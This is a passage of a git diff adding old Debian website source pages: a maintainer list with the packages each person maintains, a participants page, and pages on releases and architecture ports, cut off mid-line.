+<DT><STRONG>Stig Sandbeck Mathisen </STRONG><A HREF="mailto:ssm@debian.org"><ssm@debian.org></A> +<DD><STRONG>main:</STRONG> sharc +<DT><STRONG>Brian Mays </STRONG><A HREF="mailto:brian@debian.org"><brian@debian.org></A> +<DD><STRONG>main:</STRONG> cpio, netcdf-altdev, netcdf-bin, netcdf3, netcdfg-dev, netcdfg3, pcmcia-cs, pcmcia-modules-2.0.32, pcmcia-modules-2.0.33, pcmcia-modules-2.0.34, pcmcia-source, rxvt, xboard +<DT><STRONG>Gene McCulley </STRONG><A HREF="mailto:mcculley@debian.org"><mcculley@debian.org></A> +<DD><STRONG>contrib:</STRONG> xcopilot +<DT><STRONG>Steve McIntyre </STRONG><A HREF="mailto:stevem@chiark.greenend.org.uk"><stevem@chiark.greenend.org.uk></A> +(<A HREF="http://www.chiark.greenend.org.uk/~stevem/">home page</A>) +<DD><STRONG>main:</STRONG> motifnls, nas, netpbm, netpbm-dev, netpbm1, playmidi, ytalk +<DD><STRONG>non-free:</STRONG> netpbm-nonfree, seyon, xpostitplus +<DT><STRONG>Christian Meder </STRONG><A HREF="mailto:meder@isr.uni-stuttgart.de"><meder@isr.uni-stuttgart.de></A> +<DD><STRONG>main:</STRONG> afbackup, afbackup-client, ftape-module-2.0.30, ftape-module-2.0.32, ftape-module-2.0.33, ftape-module-2.0.34, ftape-util +<DD><STRONG>non-free:</STRONG> lclint, lclint-doc +<DT><STRONG>Michael Meskes </STRONG><A HREF="mailto:meskes@debian.org"><meskes@debian.org></A> +<DD><STRONG>main:</STRONG> djtools, ibcs2.0.33, mmv, sash, stat, xftp +<DD><STRONG>non-free:</STRONG> mpsql +<DT><STRONG>Raul Miller </STRONG><A HREF="mailto:moth@debian.org"><moth@debian.org></A> +<DD><STRONG>main:</STRONG> libxg-dev, sam +<DT><STRONG>Jim Mintha </STRONG><A HREF="mailto:jmintha@debian.org"><jmintha@debian.org></A> +<DD><STRONG>main:</STRONG> slang0.99.34, slang0.99.34-dev, slang0.99.38, slang0.99.38-dev, slang0.99.38-pic +<DT><STRONG>Martin Mitchell </STRONG><A HREF="mailto:martin@debian.org"><martin@debian.org></A> +<DD><STRONG>main:</STRONG> arena, cdtool, eject, flin, gcc-m68k-linux, gnuchess, gnuchess-book, libgsm-bin, libgsm1, libgsm1-dev, loadlin, ncftp, ncftp2, nitpic, splitdigest, sup, synaesthesia, timidity, timidity-patches, xasteroids, xbmbrowser, xpilot +<DD><STRONG>non-free:</STRONG> elvis, xmame, xmame-svga, xmame-x +<DD><STRONG>non-us:</STRONG> speak-freely +<DT><STRONG>Hamish Moffatt </STRONG><A HREF="mailto:hamish@rising.com.au"><hamish@rising.com.au></A> +(<A HREF="http://hamish.home.ml.org">home page</A>) +<DD><STRONG>main:</STRONG> cutils, geda, sortmail, www-pgsql +<DD><STRONG>contrib:</STRONG> www-mysql +<DD><STRONG>non-us:</STRONG> xpdf-i +<DT><STRONG>Paolo Molaro </STRONG><A HREF="mailto:lupus@debian.org"><lupus@debian.org></A> +<DD><STRONG>main:</STRONG> libgtk-perl, libxbase-perl +<DT><STRONG>Christopher J. Morrone </STRONG><A HREF="mailto:cmorrone@debian.org"><cmorrone@debian.org></A> +<DD><STRONG>main:</STRONG> sigrot +<DT><STRONG>Andy Mortimer </STRONG><A HREF="mailto:andy.mortimer@poboxes.com"><andy.mortimer@poboxes.com></A> +<DD><STRONG>main:</STRONG> dpkg-mountable, svgalib-bin, svgalib1, svgalib1-altdev, svgalibg1, svgalibg1-dev +<DT><STRONG>David H. Munro </STRONG><A HREF="mailto:munro@icf.llnl.gov"><munro@icf.llnl.gov></A> +<DD><STRONG>main:</STRONG> yorick, yorick-dev, yorick-gist +<DT><STRONG>Ian Murdock </STRONG><A HREF="mailto:imurdock@cs.arizona.edu"><imurdock@cs.arizona.edu></A> +(<A HREF="http://www.cs.arizona.edu/people/imurdock/">home page</A>) +<DD> +<DT><STRONG>Jonathon D Nelson </STRONG><A HREF="mailto:nels0988@tc.umn.edu"><nels0988@tc.umn.edu></A> +<DD><STRONG>main:</STRONG> boa, afterstep, berolist +<DT><STRONG>Richard Nelson </STRONG><A HREF="mailto:cowboy@debian.org"><cowboy@debian.org></A> +<DD><STRONG>main:</STRONG> sendmail +<DT><STRONG>Frank Neumann </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.informatik.uni-oldenburg.de/~amigo/">home page</A>) +<DD> +<DT><STRONG>Volker Ossenkopf </STRONG><A HREF="mailto:ossk@zeus.ph1.uni-koeln.de"><ossk@zeus.ph1.uni-koeln.de></A> +<DD><STRONG>main:</STRONG> xvmount +<DT><STRONG>Eloy A. Paris </STRONG><A HREF="mailto:peloy@debian.org"><peloy@debian.org></A> +<DD><STRONG>main:</STRONG> ncpfs, samba, smbfs, smbfsx +<DT><STRONG>Chu-yeon Park </STRONG><A HREF="mailto:kokids@doit.ajou.ac.kr"><kokids@doit.ajou.ac.kr></A> +<DD><STRONG>main:</STRONG> manpages-ko +<DD><STRONG>non-free:</STRONG> rat +<DT><STRONG>Avery Pennarun </STRONG><A HREF="mailto:apenwarr@debian.org"><apenwarr@debian.org></A> +<DD><STRONG>main:</STRONG> wvdial +<DT><STRONG>Javier Fernandez-Sanguino Pen~a </STRONG><A HREF="mailto:jfs@computer.org"><jfs@computer.org></A> +<DD><STRONG>main:</STRONG> vrwave, xswallow +<DT><STRONG>Sean E. Perry </STRONG><A HREF="mailto:shaleh@debian.org"><shaleh@debian.org></A> +<DD><STRONG>main:</STRONG> imlib-base, imlib-dev, imlib1 +<DD><STRONG>contrib:</STRONG> imlib-nonfree-dev, imlib-nonfree1 +<DD><STRONG>non-free:</STRONG> imlib-nonfree-dev, imlib-nonfree1 +<DT><STRONG>Ed Petron </STRONG><A HREF="mailto:epetron@leba.net"><epetron@leba.net></A> +(<A HREF="http://www.leba.net/~epetron/ ">home page</A>) +<DD><STRONG>main:</STRONG> pccts, sorcerer, tkps +<DT><STRONG>Ben Pfaff </STRONG><A HREF="mailto:pfaffben@pilot.msu.edu"><pfaffben@pilot.msu.edu></A> +(<A HREF="http://www.msu.edu/user/pfaffben/index-plain.html">home page</A>) +<DD><STRONG>main:</STRONG> autoconf, debview, qcam, w3-el +<DT><STRONG>Jim Pick </STRONG><A HREF="mailto:jim@jimpick.com"><jim@jimpick.com></A> +(<A HREF="http://www.jimpick.com/">home page</A>) +<DD><STRONG>main:</STRONG> dwww, gnome-hello, gnome-mico, gnome-mico-dev, libgnome-dev, libgnome0, libgtktty-dev, libgtktty0, libgtkxmhtml-dev, libgtkxmhtml0, libungif-bin, libungif3g, libungif3g-dev, swish++ +<DD><STRONG>non-us:</STRONG> des-solnet +<DT><STRONG>Marco Pistore </STRONG><A HREF="mailto:pistore@di.unipi.it"><pistore@di.unipi.it></A> +<DD><STRONG>main:</STRONG> gs, gsfonts, gv, libpaper, libpaperg +<DD><STRONG>non-free:</STRONG> gs-aladdin +<DT><STRONG>Zed Pobre </STRONG><A HREF="mailto:zed@debian.org"><zed@debian.org></A> +<DD><STRONG>contrib:</STRONG> iraf, splay, xexec +<DT><STRONG>Fabrizio Polacco </STRONG><A HREF="mailto:fpolacco@debian.org"><fpolacco@debian.org></A> +<DD><STRONG>main:</STRONG> dip, doc-linux-it, groff, libdb2, libdb2++, libdb2++-dbg, libdb2++-dev, libdb2-dbg, libdb2-dev, liblockdev0-perl, liblockdev0g, liblockdev0g-dbg, liblockdev0g-dev, man-db +<DD><STRONG>contrib:</STRONG> qweb +<DT><STRONG>Kevin Poorman </STRONG><A HREF="mailto:ewigin@softhome.net"><ewigin@softhome.net></A> +<DD><STRONG>main:</STRONG> rt +<DT><STRONG>Loic Prylli </STRONG><A HREF="mailto:lprylli@graville.fdn.fr"><lprylli@graville.fdn.fr></A> +<DD><STRONG>main:</STRONG> mailx +<DT><STRONG>Debian QA </STRONG><A HREF="mailto:debian-qa@lists.debian.org"><debian-qa@lists.debian.org></A> +<DD><STRONG>main:</STRONG> anacron, debian-policy, developers-reference, packaging-manual +<DT><STRONG>Jonathan K. Rabone </STRONG><A HREF="mailto:jkr@debian.org"><jkr@debian.org></A> +<DD><STRONG>main:</STRONG> trn +<DT><STRONG>Ardo van Rangelrooij </STRONG><A HREF="mailto:ardo.van.rangelrooij@tip.nl"><ardo.van.rangelrooij@tip.nl></A> +<DD><STRONG>main:</STRONG> debiandoc-sgml, sgmlspm +<DT><STRONG>Joe Reinhardt </STRONG><A HREF="mailto:jmr@debian.org"><jmr@debian.org></A> +<DD><STRONG>main:</STRONG> dxpc, tm +<DT><STRONG>Vincent Renardias </STRONG><A HREF="mailto:vincent@waw.com"><vincent@waw.com></A> +<DD><STRONG>main:</STRONG> bison, gdb, libwine-dbg, libwine-dev, libwine0.0.971116, manpages-fr, mount, pwgen, sac, wine, wine-doc +<DT><STRONG>Nils Rennebarth </STRONG><A HREF="mailto:nils@ipe.uni-stuttgart.de"><nils@ipe.uni-stuttgart.de></A> +(<A HREF="http://www.nus.de/~nils ">home page</A>) +<DD><STRONG>non-free:</STRONG> xearth +<DT><STRONG>Robert Resendes </STRONG><A HREF="mailto:resendes@ici.net"><resendes@ici.net></A> +<DD><STRONG>main:</STRONG> omniorb +<DT><STRONG>Jens Ritter </STRONG><A HREF="mailto:grimaldi@debian.org"><grimaldi@debian.org></A> +<DD><STRONG>main:</STRONG> otp +<DT><STRONG>Branden Robinson </STRONG><A HREF="mailto:branden@debian.org"><branden@debian.org></A> +<DD><STRONG>main:</STRONG> xbase, xbooks, xext, xfnt100, xfnt75, xfntbase, xfntbig, xfntcyr, xfntpex, xfntscl, xlib6, xlib6-altdev, xlib6g, xlib6g-dev, xmanpages, xnest, xprt, xserver-8514, xserver-agx, xserver-i128, xserver-mach32, xserver-mach64, xserver-mach8, xserver-mono, xserver-p9000, xserver-s3, xserver-s3v, xserver-svga, xserver-vga16, xserver-w32, xslib, xslibg, xvfb +<DD><STRONG>contrib:</STRONG> xtrs +<DT><STRONG>Alex Romosan </STRONG><A HREF="mailto:romosan@caliban.lbl.gov"><romosan@caliban.lbl.gov></A> +<DD><STRONG>main:</STRONG> f77reorder, vat, xrn +<DT><STRONG>Ruud de Rooij </STRONG><A HREF="mailto:r.c.m.derooij@twi.tudelft.nl"><r.c.m.derooij@twi.tudelft.nl></A> +<DD><STRONG>main:</STRONG> nmh, sted +<DD><STRONG>contrib:</STRONG> tya +<DT><STRONG>Joel Rosdahl </STRONG><A HREF="mailto:joel@debian.org"><joel@debian.org></A> +<DD><STRONG>main:</STRONG> tkcvs +<DT><STRONG>Sven Rudolph </STRONG><A HREF="mailto:sr1@inf.tu-dresden.de"><sr1@inf.tu-dresden.de></A> +(<A HREF="http://www.sax.de/~sr1/ ">home page</A>) +<DD><STRONG>main:</STRONG> lprng, lprng-doc +<DD><STRONG>non-free:</STRONG> bigloo, xtoolplaces +<DT><STRONG>Gordon Russell </STRONG><A HREF="mailto:g.russell@dcs.napier.ac.uk"><g.russell@dcs.napier.ac.uk></A> +<DD><STRONG>main:</STRONG> setserial +<DT><STRONG>Matt Ryan </STRONG><A HREF="mailto:matt@banana.org.uk"><matt@banana.org.uk></A> +<DD><STRONG>non-free:</STRONG> xfmail +<DT><STRONG>Karl Sackett </STRONG><A HREF="mailto:krs@debian.org"><krs@debian.org></A> +<DD><STRONG>main:</STRONG> libtclobjc-dev, libtclobjc1 +<DT><STRONG>Rich Sahlender </STRONG><A HREF="mailto:rsahlen@debian.org"><rsahlen@debian.org></A> +<DD><STRONG>main:</STRONG> dhcp, dhcp-beta, dhcp-relay-beta +<DT><STRONG>Davide G. M. Salvetti </STRONG><A HREF="mailto:salve@debian.org"><salve@debian.org></A> +<DD><STRONG>main:</STRONG> auctex, witalian +<DD><STRONG>contrib:</STRONG> mailcrypt +<DT><STRONG>Dale Scheetz </STRONG><A HREF="mailto:dwarf@polaris.net"><dwarf@polaris.net></A> +<DD><STRONG>main:</STRONG> ae, diff, joe, libc5, libc5-altdbg, libc5-altdev, libc6, libc6-dbg, libc6-dev, libc6-doc, libc6-pic, locales, seesat5, timezones, ucblogo, xcircuit +<DT><STRONG>Roderick Schertler </STRONG><A HREF="mailto:roderick@argon.org"><roderick@argon.org></A> +<DD><STRONG>main:</STRONG> makepatch, mon +<DD><STRONG>non-free:</STRONG> libglide2, quake2, quake2-ctf +<DT><STRONG>Heiko Schlittermann </STRONG><A HREF="mailto:heiko@lotte.sax.de"><heiko@lotte.sax.de></A> +<DD><STRONG>main:</STRONG> eperl, lshell, quota, titrax, wml, wu-ftpd-academ +<DD><STRONG>contrib:</STRONG> qtscape +<DD><STRONG>non-free:</STRONG> qt-doc, qt-snapshot-doc, qt1-snapshot, qt1-snapshot-dev, qt1g, qt1g-dev +<DT><STRONG>Martin Schulze </STRONG><A HREF="mailto:joey@debian.org"><joey@debian.org></A> +(<A HREF="http://www.infodrom.north.de/~joey/debian-index.html ">home page</A>) +<DD><STRONG>main:</STRONG> apsfilter, cfingerd, cgilib, ctwm, dbf2msql, dbf2pg, file-rc, hypermail, libdatecalc-perl, mdutils, mkhybrid, raidtools, sc, sendfile, super, sysklogd, tkirc, vtwm, xarchie, xdaliclock, zenirc +<DD><STRONG>contrib:</STRONG> dbf2msql, dbf2pg, libdbd-msql-perl, msqlperl, premail, roxen, roxen-pike, roxen-pike-msql, roxen-pike-mysql, roxen-pike-pg, staroffice3 +<DD><STRONG>non-free:</STRONG> fractxtra, libmsql2, msql, msql-doc, msqld, rman, w3-msql, xarchie, xfractint, xsnow, xsqlmenu +<DT><STRONG>Christian Schwarz </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://fatman.mathematik.tu-muenchen.de/~schwarz/ ">home page</A>) +<DD> +<DT><STRONG>Paul Seelig </STRONG><A HREF="mailto:pseelig@goofy.zdv.uni-mainz.de"><pseelig@goofy.zdv.uni-mainz.de></A> +<DD><STRONG>main:</STRONG> ethiop, mc +<DT><STRONG>Amos Shapira </STRONG><A HREF="mailto:amos@debian.org"><amos@debian.org></A> +<DD><STRONG>main:</STRONG> c2ps +<DT><STRONG>tibor simko </STRONG><A HREF="mailto:simko@debian.org"><simko@debian.org></A> +<DD><STRONG>main:</STRONG> gnuplot +<DT><STRONG>Paul Slootman </STRONG><A HREF="mailto:paul@debian.org"><paul@debian.org></A> +<DD><STRONG>main:</STRONG> isdnutils +<DT><STRONG>Craig Small </STRONG><A HREF="mailto:csmall@debian.org"><csmall@debian.org></A> +<DD><STRONG>main:</STRONG> ax25-utils, dh-make, libproc-dev, procps, psmisc, xproc +<DT><STRONG>Miquel van Smoorenburg </STRONG><A HREF="mailto:miquels@cistron.nl"><miquels@cistron.nl></A> +<DD><STRONG>main:</STRONG> inewsinn, inn, inn-dev, minicom, qpopper, squid, squid-cgi, squid-novm, squidclient, sysvinit +<DD><STRONG>non-free:</STRONG> diablo +<DT><STRONG>Manoj Srivastava </STRONG><A HREF="mailto:srivasta@debian.org"><srivasta@debian.org></A> +(<A HREF="http://www.datasync.com/%7Esrivasta/">home page</A>) +<DD><STRONG>main:</STRONG> angband-doc, c2man, cvs-buildpackage, dist, kernel-package, libcgi-perl, pkg-order, psgml, vm +<DD><STRONG>contrib:</STRONG> latex2html +<DT><STRONG>Joop Stakenborg </STRONG><A HREF="mailto:pa3aba@debian.org"><pa3aba@debian.org></A> +<DD><STRONG>main:</STRONG> colrconv, morse, xconvers, z8530-utils +<DT><STRONG>Darren Stalder </STRONG><A HREF="mailto:torin@daft.com"><torin@daft.com></A> +(<A HREF="http://www.daft.com/users/torin/ ">home page</A>) +<DD><STRONG>main:</STRONG> less, lx-gdb, perl, perl-base, perl-debug, perl-suid, weblint +<DT><STRONG>Greg Stark </STRONG><A HREF="mailto:gsstark@mit.edu"><gsstark@mit.edu></A> +<DD><STRONG>main:</STRONG> libzephyr-dev, libzephyr2, zephyr-clients, zephyr-doc, zephyr-server +<DD><STRONG>non-us:</STRONG> kerberos4kth, kerberos4kth-clients, kerberos4kth-dev, kerberos4kth-kdc, kerberos4kth-services, kerberos4kth-user, kerberos4kth-x11 +<DD><STRONG>main:</STRONG> libfltk-dev, libfltk0 +<DT><STRONG>Stephan Alexander Suerken </STRONG><A HREF="mailto:absurd@debian.org"><absurd@debian.org></A> +<DD><STRONG>main:</STRONG> gom, gom-x, uae, uae-exotic, uae-suid, xpcd, xpcd-gimp, xpcd-svga +<DT><STRONG>Ioannis Tambouras </STRONG><A HREF="mailto:ioannis@debian.org"><ioannis@debian.org></A> +<DD><STRONG>main:</STRONG> cflow +<DT><STRONG>Francesco Tapparo </STRONG><A HREF="mailto:f.tapparo@vi.nettuno.it"><f.tapparo@vi.nettuno.it></A> +<DD><STRONG>main:</STRONG> figlet, scwm +<DT><STRONG>Peter Templin </STRONG><A HREF="mailto:templin@bucknell.edu"><templin@bucknell.edu></A> +<DD> +<DT><STRONG>Ole J. Tetlie </STRONG><A HREF="mailto:olet@debian.org"><olet@debian.org></A> +<DD><STRONG>main:</STRONG> crafty +<DD><STRONG>non-free:</STRONG> rocks-n-diamonds +<DT><STRONG>Paul J Thompson </STRONG><A HREF="mailto:thomppj@debian.org"><thomppj@debian.org></A> +<DD><STRONG>contrib:</STRONG> explorer, explorer-icons-kde, explorer-icons-ms, explorer-icons-orig +<DT><STRONG>Andreas Tille </STRONG><A HREF="mailto:tille@physik.uni-halle.de"><tille@physik.uni-halle.de></A> +<DD><STRONG>main:</STRONG> wordnet, wordnet-base, wordnet-dev, wordnet-doc, xteddy +<DT><STRONG>Rob Tillotson </STRONG><A HREF="mailto:robt@debian.org"><robt@debian.org></A> +<DD><STRONG>main:</STRONG> python-kjbuckets +<DT><STRONG>Peter Tobias </STRONG><A HREF="mailto:tobias@et-inf.fho-emden.de"><tobias@et-inf.fho-emden.de></A> +(<A HREF="http://www.et-inf.fho-emden.de/~tobias/">home page</A>) +<DD><STRONG>main:</STRONG> hostname, libpcap-dev, libpcap0, netbase, netstd, socket, tcpdump +<DT><STRONG>Anthony Towns </STRONG><A HREF="mailto:ajt@debian.org"><ajt@debian.org></A> +<DD><STRONG>main:</STRONG> cruft +<DD><STRONG>non-free:</STRONG> distributed-net-pproxy +<DT><STRONG>James A. Treacy </STRONG><A HREF="mailto:treacy@debian.org"><treacy@debian.org></A> +<DD><STRONG>main:</STRONG> fftw1, fftw1-dev, glut-doc, glutg3, glutg3-dev, mesa-doc, mesag2, mesag2-dev +<DT><STRONG>Philippe Troin </STRONG><A HREF="mailto:phil@fifi.org"><phil@fifi.org></A> +<DD><STRONG>main:</STRONG> libpng2, libpng2-dev +<DT><STRONG>James Troup </STRONG><A HREF="mailto:awkmaint@nocrew.org"><awkmaint@nocrew.org></A> +<DD><STRONG>main:</STRONG> gawk, gpm, kernel-patch-2.0.33-m68k, libgdbm1, libgdbm1-altdev, libgdbmg1, libgdbmg1-dev, libgpm1, libgpm1-altdev, libgpmg1, libgpmg1-dev, mawk, pmake, quinn-diff, units +<DD><STRONG>non-us:</STRONG> gnupg +<DT><STRONG>Norbert Veber </STRONG><A HREF="mailto:nveber@debian.org"><nveber@debian.org></A> +<DD><STRONG>main:</STRONG> bplay, xinetd +<DT><STRONG>Santiago Vila </STRONG><A HREF="mailto:sanvila@ctv.es"><sanvila@ctv.es></A> +<DD><STRONG>main:</STRONG> base-files, debmake, dialog, doc-debian, gettext, indent, original-awk, procmail, sharutils, smartlist +<DD><STRONG>non-free:</STRONG> pine396-diffs, pine396-src +<DD><STRONG>non-us:</STRONG> unzip-crypt, zip-crypt +<DT><STRONG>Tommi Virtanen </STRONG><A HREF="mailto:tv@debian.org"><tv@debian.org></A> +<DD><STRONG>main:</STRONG> nslint +<DD><STRONG>non-us:</STRONG> fortify, pgp5i +<DT><STRONG>Riku Voipio </STRONG><A HREF="mailto:riku.voipio@iki.fi"><riku.voipio@iki.fi></A> +<DD><STRONG>main:</STRONG> gnome, gnome-dev +<DT><STRONG>Jaldhar H. Vyas </STRONG><A HREF="mailto:jaldhar@debian.org"><jaldhar@debian.org></A> +<DD><STRONG>main:</STRONG> pppupd, xmbase-grok +<DD><STRONG>non-free:</STRONG> wwwcount +<DT><STRONG>Vadim Vygonets </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.cs.huji.ac.il/~vadik/ ">home page</A>) +<DD> +<DT><STRONG>Hanno Wagner </STRONG><A HREF="mailto:wagner@linux.de"><wagner@linux.de></A> +<DD><STRONG>contrib:</STRONG> qps +<DT><STRONG>Bart Warmerdam </STRONG><A HREF="mailto:bartw@debian.org"><bartw@debian.org></A> +<DD><STRONG>main:</STRONG> sound-recorder +<DT><STRONG>Behan Webster </STRONG><A HREF="mailto:behanw@pobox.com"><behanw@pobox.com></A> +<DD><STRONG>main:</STRONG> tkhylafax +<DT><STRONG>David N. Welton </STRONG><A HREF="mailto:davidw@efn.org"><davidw@efn.org></A> +<DD><STRONG>main:</STRONG> bezerk, epic4, pftp, yagirc +<DT><STRONG>ted whalen </STRONG><A HREF="mailto:tew@debian.org"><tew@debian.org></A> +<DD><STRONG>main:</STRONG> wm2 +<DT><STRONG>Brian White </STRONG><A HREF="mailto:bcwhite@pobox.com"><bcwhite@pobox.com></A> +<DD><STRONG>main:</STRONG> gnats, gnats-tk, gnats-user, infocom, mime-support, spamfilter +<DD><STRONG>contrib:</STRONG> netscape3, netscape4 +<DT><STRONG>Pawel Wiecek </STRONG><A HREF="mailto:coven@debian.org"><coven@debian.org></A> +<DD><STRONG>main:</STRONG> doc-linux-pl, doc-linux-pl-html +<DD><STRONG>non-free:</STRONG> mush +<DT><STRONG>Lars Wirzenius </STRONG><A HREF="mailto:liw@iki.fi"><liw@iki.fi></A> +<DD><STRONG>main:</STRONG> sex, syslog-summary +<DD><STRONG>non-us:</STRONG> pgp-i, pgp-us, rsaref +<DT><STRONG>joost witteveen </STRONG><A HREF="mailto:joostje@debian.org"><joostje@debian.org></A> +(<A HREF="http://rulcmc.leidenuniv.nl/~joostje/index.html">home page</A>) +<DD><STRONG>main:</STRONG> fakeroot, libg++27, libg++27-altdev, menu, xaw3d, xaw3dg, xaw95, xaw95g +<DT><STRONG>Robert Woodcock </STRONG><A HREF="mailto:rcw@oz.net"><rcw@oz.net></A> +<DD><STRONG>main:</STRONG> fonter +<DT><STRONG>Herbert Xu </STRONG><A HREF="mailto:herbert@debian.org"><herbert@debian.org></A> +(<A HREF="http://gondor.apana.org.au/~herbert/">home page</A>) +<DD><STRONG>main:</STRONG> ash, dosemu, kernel-doc-2.0.33, kernel-doc-2.0.34, kernel-headers-2.0.33, kernel-headers-2.0.34, kernel-image-2.0.33, kernel-image-2.0.34, kernel-source-2.0.33, kernel-source-2.0.34, metamail, prcs, v-altdev, v-bin, v-dbg, v-dev, v1, v1g, xlockmore, xlockmore-gl +<DD><STRONG>non-free:</STRONG> gettyps, newsgate +<DT><STRONG>Yoshiaki Yanagihara </STRONG><A HREF="mailto:yochi@debian.or.jp"><yochi@debian.or.jp></A> +<DD><STRONG>main:</STRONG> canna, canna-utils, im, jless, kon2, kterm, libcanna1g, libcanna1g-dev, mew, skk, skk-dictools, skkdic, skkserv +<DT><STRONG>Alexander Yukhimets </STRONG><A HREF="mailto:alexy@debian.org"><alexy@debian.org></A> +<DD><STRONG>contrib:</STRONG> ddd-dmotif, ddd-smotif +<DT><STRONG>Milan Zamazal </STRONG><A HREF="mailto:pdm@fi.muni.cz"><pdm@fi.muni.cz></A> +<DD><STRONG>main:</STRONG> casio, cweb, emacs-czech, fortunes-cs, phalanx, sgb, swi-prolog +<DT><STRONG>Enrique Zanardi </STRONG><A HREF="mailto:sr1-boot-floppies@debian.org"><sr1-boot-floppies@debian.org></A> +<DD><STRONG>main:</STRONG> boot-floppies, doc-linux-es, modconf, newt0.21, newt0.21-dev, popt, transfig, whiptail, wspanish, xmgr +<DT><STRONG>Stephen Zander </STRONG><A HREF="mailto:gibreel@debian.org"><gibreel@debian.org></A> +<DD><STRONG>non-free:</STRONG> jdk1.1-dev, jdk1.1-runtime +<DT><STRONG>James R. Van Zandt </STRONG><A HREF="mailto:jrv@vanzandt.mv.com"><jrv@vanzandt.mv.com></A> +<DD><STRONG>main:</STRONG> adjtimex, dtlk, emacspeak, emacspeak-bs-tcl, emacspeak-dt-tcl, gpstrans, mirrordir, flip +<DT><STRONG>Alen Zekulic </STRONG><A HREF="mailto:azekulic@fesb.hr"><azekulic@fesb.hr></A> +<DD><STRONG>main:</STRONG> regina-rexx, regina0, regina0-dev, the, the-doc<BR> +</DL> diff --git a/english/devel/people.wml b/english/devel/people.wml new file mode 100644 index 00000000000..b7ed6265de6 --- /dev/null +++ b/english/devel/people.wml @@ -0,0 +1,20 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Project Participants" + +<H1>Project Participants</H1> + +PGP keys of package maintainers can be downloaded from +<A HREF="ftp://ftp.debian.org/debian/doc/debian-keyring.tar.gz">here</A>. +<BR> +If you would like to see a map of the world showing the location of many +maintainers, you can download an <A HREF="developers.xearth">xearth marker file</A> or take a look at +<A HREF="developers.gif">developers.gif</A>. + +#include '../../english/devel/people.names' + +<HR> + +<P>Back to the <A href="../">Debian GNU/Linux homepage</A>. +<HR> + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/ports.wml b/english/devel/ports.wml new file mode 100644 index 00000000000..e4f57a2c8b1 --- /dev/null +++ b/english/devel/ports.wml @@ -0,0 +1,97 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Release Information" + +<H1>Release Information</H1> + +<P>Unlike most commercial operating systems, Debian is constantly being +improved. Each major release +generally involves the addition of new capabilities while +minor releases only involve software upgrades. +In addition, the +<A HREF="http://www.linux.org">Linux</A> kernel is constantly being +improved. +The nicknames for each release, seen below, are given during development +to keep them separate from released versions. + + +<A NAME="releases"><P><STRONG>Current Debian release = 1.3.1 (released 2 Jul 1997)</STRONG></A> + +<P><STRONG>Debian version 1.2</STRONG> (Nickname: rex) + <UL> + <LI>released mid-Dec 1996 + <LI>many new packages + <LI>many bug fixes + </UL> + +<P><STRONG>Debian version 1.3</STRONG> (Nickname: bo) + <UL> + <LI>released - June 1997 + <LI>shadow passwords supported + <LI>improved package organization + <LI>better testing of packages implemented + <LI>zero floppy disk installation (CD is bootable if your machine supports it) + <LI>X windows version 3.3 + </UL> + +<P><STRONG>Debian version 2.0</STRONG> (Nickname: hamm) + <UL> + <LI>estimated release - early 1998 + <LI>based on libc6 (all libraries compiled using -D_REENTRANT) + <LI>improved package selection program + <LI>libpam used for authentication + <LI>first public release for alpha and m68k architectures + </UL> + +<HR> +<A NAME="ports"><P><STRONG>Other architectures:</STRONG></A><BR> +Debian is working on releases for the following architectures. +[need status information on these] + +<UL> +<LI><STRONG>m68k</STRONG> +The m68k distribution was the first non-i386 architecture port and is +probably the most mature. There are Atari bootdisks and Amiga ones +should be done shortly. + +<P>Until recently there were problems with glibc2 on machines with an +68040 or 68060. Anyone with one of these machines should ensure that +they are using the latest glibc (libc6_2.0.5c-1) and a recent kernel +(2.0.31-pre2 or 2.1.57). + +<P>Approximately 80% of Debian packages have been compiled for +m68k. Anyone interested in installing the current snapshot of +Debian/m68k is encouraged to join the debian-68k mailing list and +review the mailing list archives to learn more about the state of the +system and hints for successful installation. It is intended that the +m68k port be ready for public release by the time Debian 2.0 is +released. +<LI><STRONG>alpha</STRONG><BR> +The Alpha distribution is now to a state where installation of a +functional system including the base system and a useful set of +development tools is quite possible from scratch. +Not all of the packages available for the x86 have been +ported yet, but the Alpha distribution was the first Debian distribution +to depend on libc6, and it is likely that the Alpha will be a supported +platform in Debian 2.0. + +<BR>Anyone interested in installing the current +snapshot of Debian for Alpha is encouraged to join the debian-alpha mailing +list and review the mailing list archives to learn more about the state of +the system and hints for successful installation. +<LI><STRONG>sparc</STRONG><BR> +The Sparc distribution is progressing, but is waiting for the port of glibc +to Sparc to stabilize before pushing for a release. +<BR>Anyone interested in installing the current +snapshot of Debian for Sparc is encouraged to join the debian-sparc mailing +list and review the mailing list archives to learn more about the state of +the system and hints for successful installation. +<LI><STRONG>mips</STRONG><BR> +*Very* early stage: only ~50 untested packages. +<LI><STRONG>powerpc</STRONG><BR> +Early stage; about 250 working packages, but no install procedure +yet. (No release date planned yet) +</UL> + +<P>Back to the <A HREF="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "devel", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/release_info.wml b/english/devel/release_info.wml new file mode 100644 index 00000000000..5d712bf4f79 --- /dev/null +++ b/english/devel/release_info.wml @@ -0,0 +1,107 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Release Information" + +<H1>Release Information</H1> + +<P>Unlike most commercial operating systems, Debian is constantly being +improved. Each major release +generally involves the addition of new capabilities while +minor releases only involve software upgrades. +In addition, the +<A HREF="http://www.linux.org">Linux</A> kernel is constantly being +improved. +The nicknames for each release, seen below, are given during development +to keep them separate from released versions. + + +<A NAME="releases"><P><STRONG>Current Debian release = 1.3.1 (released 2 Jul 1997)</STRONG></A> + +<P><STRONG>Debian version 1.2</STRONG> (Nickname: rex) + <UL> + <LI>released mid-Dec 1996 + <LI>many new packages + <LI>many bug fixes + </UL> + +<P><STRONG>Debian version 1.3</STRONG> (Nickname: bo) + <UL> + <LI>released - June 1997 + <LI>shadow passwords supported + <LI>improved package organization + <LI>better testing of packages implemented + <LI>zero floppy disk installation (CD is bootable if your machine supports it) + <LI>X windows version 3.3 + </UL> + +<P><STRONG>Debian version 2.0</STRONG> (Nickname: 